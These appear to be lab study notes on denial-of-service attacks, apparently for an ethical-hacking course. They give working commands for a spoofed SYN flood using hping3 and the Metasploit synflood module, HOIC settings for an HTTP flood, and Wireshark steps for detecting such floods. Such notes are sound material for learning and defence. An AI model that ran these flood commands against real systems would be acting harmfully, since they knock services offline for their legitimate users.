A Denial of Service (DoS) attack is a malicious attempt to disrupt the normal functioning of a network, service, website, or computer system by overwhelming it with an excessive amount of traffic, requests, or other forms of malicious activity. The primary goal of a DoS attack is to make the target system or network unavailable to its intended users.
Here are some key characteristics of a Denial of Service attack:
Overload: Attackers flood the target with a massive volume of traffic, which can be in the form of network requests, data packets, or other resource-consuming actions. The target system becomes overwhelmed and is unable to handle the volume of incoming requests.
Resource Depletion: DoS attacks may aim to exhaust system resources such as bandwidth, processing power, memory, or network connections. This can result in the target system slowing down or becoming completely unavailable.
Temporary Disruption: DoS attacks typically result in a temporary disruption of services. Once the attack ceases, the affected system can often recover and resume normal operation.
Distributed DoS (DDoS): In more advanced attacks, multiple compromised computers or devices are used to launch a Distributed Denial of Service (DDoS) attack. This makes it much more challenging to mitigate the attack because it comes from multiple sources simultaneously.
Motivation: DoS attacks can be carried out for various reasons, including financial gain, ideological reasons, revenge, or simply for the thrill of causing disruption.
Legality: DoS attacks are illegal in many jurisdictions and can result in criminal charges if the attackers are identified and apprehended.
SYN Flooding
SYN flooding is a type of cyberattack that targets a server by overwhelming it with a flood of fake or incomplete connection requests (SYN packets). These requests are part of the 3-way handshake process used to establish a connection between a client and a server. In a SYN flood attack, the attacker sends a large number of SYN packets without completing the handshake, tying up the server's resources and preventing it from servicing legitimate connections.
This can lead to a denial of service (DoS) or distributed denial of service (DDoS) attack, causing the server to become unresponsive. Mitigation strategies include rate limiting, SYN cookies, and deploying intrusion detection and prevention systems.
SYN Flooding
Perform a SYN Flooding on a Target Host using hping3
Target:
Wireshark->Ethernet
Attacker
hping3 -S <Target IP> -a <Spoofable IP> -p <Port to flood> -flood
nmap -p 21 10.10.10.10 #check open ports or specific port
msfconsole -q #start msfconsole
use auxiliary/dos/tcp/synflood #SYN Flooding module
set RHOST <Target IP>
set RPORT 21
set SHOST <Spoofed IP Address> #Our fake IP
set TIMEOUT 20000 and press Enter
#open Wireshark and View Flood attack on victim via Wireshark, use filter:
tcp.port=21
HTTP Flooding Attack
HTTP flood attack
HTTP flood attack, is a type of cyberattack aimed at overwhelming a web server by sending a massive volume of HTTP requests. These requests often mimic legitimate user interactions with a website, such as GET or POST requests for web pages or resources. The intent is to consume the server's resources, exhaust its processing capacity, and cause it to become slow or unresponsive, resulting in a denial of service (DoS) situation.
Attackers may employ botnets or distributed networks of compromised devices to intensify the attack. Defenses against HTTP flooding include rate limiting, traffic analysis, and content delivery networks (CDNs) to absorb excess traffic and protect the target server.
HTTP Flooding Attack using HOIC (High Orbit Ion Cannon)
Open HOIC.
Set threads = 20
Click + to add target
Enter Target http://<Target IP> -> Power = High -> Booster = GenericBoost.hoic
To find DOS -> Look for Red and Black packets with around 1-2 simple packets in between and then pick any packet and check the Source and Destination IP with port if need.
To determine the number of machines that were involved in DDOS attack
statistic -> IPv4 statistic -> source and destination address
Or
View Flood attack on victim via Wireshark | use filter tcp.port=21
Or
Find the dos attacker ip using Wireshark
Statistic -> conversion
identified ip , which has flooding server with SYN request.
Or
get the statistics of ipv4 -> we can see that Packets B -> A are null, because the're not reply pack.